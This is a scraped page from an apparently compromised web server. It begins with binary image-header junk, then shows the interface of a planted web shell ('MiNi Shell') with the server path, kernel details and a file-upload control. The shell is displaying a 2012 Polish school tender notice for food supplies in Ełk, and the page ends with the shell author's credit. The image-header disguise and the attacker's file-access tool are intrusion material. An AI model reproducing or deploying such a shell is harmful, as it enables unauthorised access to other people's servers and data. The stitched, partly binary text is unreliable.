JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120507/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120507/142976-N-2012.html

<p class="kh_header"><b>Ełk: Dostawa artykułów żywnościowych  przez okres od 25.08.2012 r.  do 24.08.2013 r.</b><br>
<b>Numer ogłoszenia: 142976 - 2012; data zamieszczenia: 07.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa nr 5 w Ełku , ul. Św. M. M. Kolbego 11, 19-300 Ełk, woj. warmińsko-mazurskie, tel. 0-87 6203171, faks 0-87 6203171.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych  przez okres od 25.08.2012 r.  do 24.08.2013 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Warzywa i owoce 
CPV 15300000-1 Owoce, warzywa i podobne produkty

Lp.
Asortyment
Jedn. miary
Ilość
Cena netto
Vat
Wartość ogółem brutto
Warzywa
1.
Ziemniaki 
CPV 03212100-1
kg
  22.000



2.
Marchew
CPV 03221112-4
kg
    2.000



3.
Pietruszka
CPV 03221110-0
kg
500



4.
Seler
CPV 03221110-0
kg
      500



5.
Cebula
CPV 03221113-1
kg
    1.500



6.
Nać pietruszki
CPV 15300000-1
szt
    2.000



7.
Koper
CPV 15300000-1
szt
    1.000



8.
Por
CPV 03221110-0
kg
      100



9.
Ogórek kwaszony
CPV 15331400-1
kg
      1000



10
Ogórek świeży
CPV 03221270-9
kg
    800



11
Pomidory
CPV  03221240-0
kg
    800



12
Papryka, żółta, zielona czerwona
CPV 03221230-7
kg
      60



13
Kapusta biała
CPV 03221410-3
kg
    2500



14
Kapusta pekińska
CPV  03221300-9
kg
     200



15
Kapusta czerwona
CPV 03221300-9
kg
   700



16
Kapusta kwaszona
CPV 15331000-7
kg
    1.200



17
Rzepa Agata
CPV 03221114-8
kg
      600



18
Sałata
CPV 03221310-2
szt.
    1500



19
Ogórek korniszon 0,9l
CPV 15331000-7
szt.
    1.000



20
Fasola średni Jaś
CPV 03221210-1
kg
     400



21
Fasola drobna
CPV 03221210-1
kg                
     200



22
Groch połówki
CPV 03221220-4
kg
     150



23
Groszek konserwowy 400g
CPV 15331400-1
szt.
     600



24
Kukurydza konserwowa 400g
CPV 15331400-1
szt.
     200



25
Buraki czerwone
CPV 03221111-7

kg
   1500



26
Cytryna
CPV 03222210-8
kg
     100



27
Jaja
CPV 03142500-3
kg
    1200



28
Pieczarki
CPV 15300000-1
kg
      500



29
Fasolka czerwona konserwowa 400g
CPV 15331400-1
szt.
      50



30
Papryka konserwowa 0,9l
CPV 15331400-1
szt.
      50



33
Rzodkiewka
CPV 03221110-0
pęczek
    500



34
Szczypior
CPV 15300000-1
pęczek

    600



             Owoce
35
Pomarańcze
CPV 03222220-1
kg
   2000



36
Mandarynki
CPV 03222230-4 
kg
   150



37
Banany
CPV 03222111-4
kg
2000



38
Brzoskwinie w syropie 820g
CPV  15332400-8
szt.
    200



39
Jabłka
CPV 03222321-9
kg
  2000



40
Nektarynka
CPV 03200000-3
kg
   150



41
Brzoskwinia
CPV 03222332-9
kg
   150



42
gruszki
kg
     1500

Grupa  II  		Załącznik nr 2	

Oferta od  25.08.2012 r.  do 24.08.2013 r. 

Artykuły spożywcze
CPV 15800000-6 Różne produkty spożywcze
Lp.
Asortyment
Jedn. miary
Ilość
Cena 
netto
Vat
Wartość ogółem brutto




Inne artykuły spożywcze




1.
Sos myśliwski 33g
CPV 15871260-4
szt
80







2.
Sos pieczarkowo-grzybowy 33g
CPV 15871260-4
szt
80







5.
Budyń 60g
CPV 15800000-6
szt.
700







6.
Kawa zbożowa typu inka150g
CPV 15800000-6
szt.
50







7.
Cukier opakowania 1kg.
CPV 15831000-2
kg
2.000







8.
Ciastka herbatniki100g
CPV 15812100-4
szt.
1.000







9.
Dżem 400g różne smaki
CPV 15332290-3
szt.
200







10.
Herbata granulowa- na100g typu Lipton
CPV 15863000-5
szt.
100







11.
Kisiel Gellwe lub Dr Oetker różne smaki  
CPV 15800000-6
szt.
1.700








Herbata owocowa np. Hibiskus liściasta
Szt.
100







12.
Kompot czarna porzeczka 0,9l
CPV 15332100-5
szt.
500







13.
Ketchup bez konserwantów typu Pudliszki 0,5l
CPV 15871230-5
szt.
20







14.
Kakao rozpuszczalne typu Puchatek  300 g
CPV 15841000-5
szt.
70




15.
Koncentrat pomidorowy 0,9l
CPV 15800000-6
szt.
400







16.
Kasza jęczmienna opakowanie 0,5 kg
CPV 15613300-1
szt.
600







17.
Kasza manna opakowania 1 kg
CPV 15800000-6
kg
90







18.
Kwasek cytrynowy 20g
CPV 15800000-6
szt.
600







19.
Liść laurowy 15g
CPV 15870000-7
szt.
100







20.
Mąka ziemniaczana opakowanie1kg
CPV 15800000-6
kg
50







21.
Miód pszczeli naturalny 400g
CPV 03142100-9
szt.
250







22
Makaron świderki typu Lubella opakow. 0,5 kg
CPV 15851100-9
szt.
1.000







23.
Kostki rosołowe typu kura120g
CPV 15870000-7
szt.
1500







24.
Kompot truskawkowy  0,9l
CPV 15332100-5
szt.
500







25.
Kompot wiśniowy 0,9l
CPV 15332100-5
szt.
500







26.
Kompot śliwkowy 0,9l
CPV 15332100-5
szt.
500







27.
Syrop różne smaki z witaminą  C bez konserwantów typu herbapol 420ml
CPV 15831500-7
szt.
2000







28.
Musztarda 180g
CPV 15871250-1
szt.
500







29.
Majeranek 20g
CPV 15871230-5
szt.
400







30.
Mąka zwykła opakowania  1 kg
CPV 15612100-2
kg
1.000







31.
Olej  roślinny 1l
CPV 15411100-3
l
1.800







32.
Płatki owsiane opakowania 0,5 kg
CPV 15613380-5
szt.
50







33.
Płatki jęczmienne
Opakowania 0,5kg
CPV 15894000-1
szt.
50







34.
Pieprz mielony 20g
CPV 15872100-2
szt.
300







35.
Pieprz ziołowy 20g CPV 15872100-2
szt.
   800







37.
Papryka mielona 20g
CPV 15870000-7
szt.
60







38.
Ryż opakowania   1kg
CPV 03211300-6
kg
250







39.
Sól
CPV 15872400-5
kg
350







40.
Przyprawa typu wegeta 
200 g 
CPV 15871270-7
szt.
800







41.
Przyprawa do zup typu Magi 0,2 l 
CPV 15871270-7
szt.
200







42.
Płatki ryżowe błyskawiczne, opakowania 0,5kg
CPV  15613311-1

szt.

      200







43.
Ziele angielskie 15g
CPV 15870000-7
szt.
 150







44.

Makaron zacierka typu Babuni 250g
CPV 15851100-9
    szt.
     200








45.
Galaretka owocowa różne smaki 79g  
CPV 15332240-8
  szt.
  700







46.
Majonez typu napoleoński 320 ml
CPV 15871273-8
szt.
  300







47.
Wafelek typu princeska 36g różne smaki
CPV 15812100-4
szt.
1000







48.
Napoje niegazowane różne smaki 200mi
CPV 15900000-7
szt.
4000







49.
Płatki kukurydzane z miodem i orzechami typu gold fakes  lub czekoladowe typu Nesquik i Chocapic opakowania 250g
CPV 15613311-1
szt.
  600







50.
Soczek marchwiowy typu Kubuś 1l
CPV 15322000-1
szt.
  1000







51.
Chrupki kukurydziane zwykłe typu Mazurki opakowania 55g
CPV 15812100-4
szt.
500







52.
Cukier waniliowy 16g
CPV 15830000-5
szt.
60







53.
Ciastka pierniczki  w polewie lukrowej
CPV 15812100-4

kg

  80







54.


Ciastka pierniczki  w polewie czekoladowej
CPV 15812100-4

kg

  70







55.
Zioła prowansalskie
CPV 15872000-1
szt.
100







56.
Krem czekoladowy typu nutella 320g
CPV
szt.
  200








Wafelki typu Familijne
CPV 158121004
Szt.
150







57
Cynamon
CPV 15870000-7
szt
    25







Grupa III		                Załącznik nr 3

Oferta od  25.08.2012 r.  do 24.08.2013 r. 

Nabiał
CPV 15500000-3 Produkty mleczarskie

Lp.
Asortyment
Jedn. miary
Ilość
Cena 
netto
Vat
Wartość ogółem brutto
Nabiał
1.
Mleko 2%
CPV 03333000-4
l
8.000



2.
Masło naturalne extra 0,2kg
CPV 15530000-2
kg
1500



3.
Śmietana  18% typu łaciata  500g
CPV 15512000-0
l
1.000



4.     
Śmietana  18% typu mazurska 400g
CPV 15512000-0
     
      szt.        

   1.200




5.
Twaróg  półtłusty 250g
CPV 15542100-0
kg
800



6.
Jogurty pitny typu milko 200g
CPV 15551320-4
szt.
6.000



7.
Maślanka owocowa 1l różne smaki
CPV 15551500-0
szt.
600



8.
Serki waniliowe 140g
CPV 15545000-0
szt.
1800



9.
Ser żółty  salami
CPV 15544000-3
kg
150



10.
Serki topione 100g kostki
CPV 15540000-5
szt.
500



11.
Mleko smakowe typu łaciate 1.5% różne smaki 200ml
CPV 15511000-3
szt.
3.500



12.
Deser mleczny typu Monte 0,065g
CPV 15500000-3
szt.
6.000



13.
Jogurt pyszny typu Danon różne smaki 125g
CPV 15551320-4
szt.
3.000



14.
Galaretka owocowa różne smaki 175g
CPV 15332240-8
szt.
600



15.
Jogurt typu jogobella  125g
CPV  15551320-4
szt.
4.000



Grupa IV		      Załącznik nr 4

Oferta od 25.08.2012 r.  do 24.08.2013 r. 

Pieczywo
CPV  15810000-9 Pieczywo, świeże wyroby piekarskie i ciastkarskie
Lp.
Asortyment
Jedn. miary
Ilość
Cena 
netto
Vat
Wartość ogółem brutto
Pieczywo
1.
Chleb krojony mieszany
CPV 15811100-7
kg
3.000



2.
Chleb  wieloziarnisty 
CPV 15811100-7
kg
700



3.
Bułeczki zwykłe   typu szlak 90g
CPV 15811400-0
szt.
600




Bułka kajzerka
Szt
8.000



4.
Bułeczki słodkie w tym: pączki, serniczki, rogaliki i inne 40g
CPV 15811400-0
szt.
6.000



5.
Chałka 
CPV15811000-6
kg
700



6.
Baton pszenny
typu wrocławski
CPV 15811000-6
kg
600



7.
Ciasto drożdżowe z  kruszonką
CPV 15812200-5
kg
200



8.
Bułka tarta 1kg 
CPV 15810000-9
kg
450



9.
Rogal maślany 
CPV 15811000-6
kg
2.500



10.
Chleb razowy 
CPV 15811100-7
kg
700



Grupa V		              Załącznik nr 5

Oferta od 25.08.2012 r.  do 24.08.2013 r. 

Mięso i jego przetwory
CPV 15130000-8 Produkty mięsne
Lp.
Asortyment
Jedn. Miary
Ilość
Cena 
netto
Vat
Wartość ogółem brutto
Mięso surowe
1.
Mięso wieprzowe drobne 
CPV 15113000-3
kg
3.500



2.
Mięso drobiowe  drobne
CPV 15112000-6
kg
700



3.
Schab bez kości
CPV  15113000-3
kg
700



5.
Ozorki wieprzowe
CPV 15114000-0
kg
250



7.
Kości wieprzowe
CPV  15113000-3
kg
600



8.
Podudzia z kurczaka
CPV 15112000-6
kg
700



9.
Udka z kurczaka
CPV 15112000-6
kg
250



10.
Filet kurczęcy
CPV 15112000-6
kg
600



11.
Pachwina surowa
CPV  15113000-3
kg
100



12.
Słonina
CPV  15113000-3
kg
20



13.

Łopatka wieprzowa b/k                       
CPV 15113000-3
kg

200





14.
Karczek b/k
CPV 15113000-3
kg
1000



15.
Mięso wołowe drobne 
CPV 15111100-0
Kg
100



16.
Wątroba wieprzowa
CPV 15114000-0
kg
500



     Wędliny
17.
Polędwica wędzona wieprzowa typu Sopocka
CPV 15131120-2
Kg
120



18.
Szynka wędzona wieprzowa
CPV 15131210-0
Kg
120



19.
Pasztet drobiowy typu białostocki 280g
CPV 15131310-1
szt.
   200



20.
Kiełbasa cienka  typu śląska
CPV 15131120-2
Kg
200



21.
Wędlina drobiowa
CPV 15131120-2
Kg
80



22.
Szynka konserwowa
CPV 15130000-8
Kg
80



23.
Kiełbasa typu Krakowska Sucha
CPV 15131120-2
      
      Kg
  
   120



24.
Kiełbaski typu berlinetki
CPV 15131120-2
      Kg
  300



25.
Boczek wędzony CPV 15131120-2
     Kg
  200



Grupa VI		Załącznik nr 6

Oferta od  25.08.2012 r.  do 24.08.2013 r. 

Ryby  
CPV 03311000-2 Ryby

Lp.
Asortyment
Jedn. Miary
Ilość
Cena 
netto
Vat
Wartość ogółem brutto
Ryby
1.
Filet  z miruny ze skórą
CPV 15211000-0
kg
1.200



2
śledź marynowany
CPV 15211000-2
Kg
50



3
Makrela wędzona
CPV 15211000-2
Kg
100



GRUPA VII			Załącznik nr 7

Oferta od 25.08.2012 r.  do 24.08.2013 r. 

Mrożonki
CPV 15896000-5 Produkty głęboko mrożone
Lp.
Asortyment
Jedn. Miary
Ilość
Cena 
netto
Vat
Wartość ogółem brutto

Mrożonki





2.
Kalafior mrożony
CPV 15331100-8
kg
400



3.
Mieszanka kompotowa
CPV 15332100-5
kg
1.000



4.
Marchewka z groszkiem
CPV 15331100-8
kg
550



5.
Mieszanka warzywna
CPV 15331100-8
kg
250



6.
Truskawki mrożone
CPV 15332100-5
kg
300





7.
Brokuły
CPV 03221430-9
kg
400.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.80.00.00-6, 15.50.00.00-3, 15.81.00.00-9, 15.13.00.00-8, 03.31.10.00-2, 15.89.60.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczególnych warunków  w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczególnych warunków  w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczególnych warunków  w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczególnych warunków  w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczególnych warunków  w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Oświadczenie, w którym Wykonawca potwierdza, że jest związany ofertą przez okres 30 dni od dnia, w którym upływa termin składania ofert.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> sp5.elk.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szkoła Podstawowa nr 5 w Ełku, 19-300 Ełk, ul. św. M. M. Kolbego nr 11 
pok. 40..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.05.2012 godzina 11:30, miejsce: Szkoła Podstawowa nr 5 w Ełku, 19-300 Ełk, ul. św. M. M. Kolbego nr 11 
 pok. 40..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com